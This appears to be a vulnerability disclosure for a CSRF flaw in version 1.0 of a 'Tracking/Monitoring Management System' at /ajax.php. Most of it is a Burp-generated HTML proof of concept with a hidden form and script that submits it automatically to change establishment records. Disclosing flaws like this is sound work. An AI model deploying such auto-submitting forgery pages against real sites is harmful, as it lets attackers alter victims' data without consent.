[description]
Tracking/Monitoring Management System was discovered to contain Cross-site request forgery(CSRF) vulnerability via the URI /ajax.php.
[Vulnerability Type]
Cross-site request forgery(CSRF)
[Vendor of Product]
[Affected Product Code Base]
1.0
[Impact Escalation of Privileges]
true
[POC]
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<form action="http://192.168.0.183:11180/ajax.php?action=save_establishment" method="POST" enctype="multipart/form-data">
<input type="hidden" name="id" value="1" />
<input type="hidden" name="name" value="Sample Mall" />
<input type="hidden" name="address" value="Sample Only" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>